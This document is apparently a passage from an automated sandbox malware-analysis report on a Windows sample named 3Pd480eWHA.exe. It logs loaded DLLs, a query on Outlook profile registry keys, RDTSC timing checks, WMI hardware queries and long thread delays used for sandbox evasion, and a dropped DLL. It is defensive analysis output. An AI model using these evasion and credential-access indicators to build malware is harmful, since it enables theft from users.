            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: 3Pd480eWHA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00110C53 push ebx; retf 9_2_00110C52
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00110C45 push ebx; retf 9_2_00110C52
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00110C6D push edi; retf 9_2_00110C7A
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_38EA76E0 push esp; iretd 9_2_38EA76E9
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeFile created: C:\Users\user\AppData\Local\Temp\nsn1341.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeAPI/Special instruction interceptor: Address: 5F1EB64
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeAPI/Special instruction interceptor: Address: 32DEB64
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeRDTSC instruction interceptor: First address: 5ECACE4 second address: 5ECACE4 instructions: 0x00000000 rdtsc 0x00000002 test ebx, eax 0x00000004 test edx, eax 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FDCC11C562Eh 0x0000000a cmp dx, ax 0x0000000d test bx, bx 0x00000010 inc ebp 0x00000011 test cl, al 0x00000013 inc ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeRDTSC instruction interceptor: First address: 328ACE4 second address: 328ACE4 instructions: 0x00000000 rdtsc 0x00000002 test ebx, eax 0x00000004 test edx, eax 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FDCC14C66AEh 0x0000000a cmp dx, ax 0x0000000d test bx, bx 0x00000010 inc ebp 0x00000011 test cl, al 0x00000013 inc ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeMemory allocated: 357F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeMemory allocated: 377F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199969Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199859Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199747Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199640Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199531Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199422Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199312Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199203Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199094Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198984Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198875Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198766Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198656Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198545Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198437Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198328Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198219Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198109Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1198000Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197891Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197781Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197672Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197562Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197453Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1197342Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWindow / User API: threadDelayed 7968Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWindow / User API: threadDelayed 1874Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn1341.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeAPI coverage: 2.4 %
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 508Thread sleep count: 7968 > 30Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 508Thread sleep count: 1874 > 30Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99407s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -99063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -98110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -97110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199747s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1199094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198545s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1198000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1197891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1197781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1197672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1197562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1197453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exe TID: 5688Thread sleep time: -1197342s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00406010 FindFirstFileA,FindClose,9_2_00406010
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_00402688 FindFirstFileA,9_2_00402688
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeCode function: 9_2_004055AE DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_004055AE
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99657Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99532Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99407Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99297Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99188Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 99063Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98938Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98813Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98688Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98578Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98469Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98344Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98235Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 98110Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97985Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97860Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97735Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97610Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97485Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97360Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97235Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 97110Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199969Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199859Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199747Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199640Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199531Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199422Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199312Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199203Jump to behavior
            Source: C:\Users\user\Desktop\3Pd480eWHA.exeThread delayed: delay time: 1199094Jump to behavior
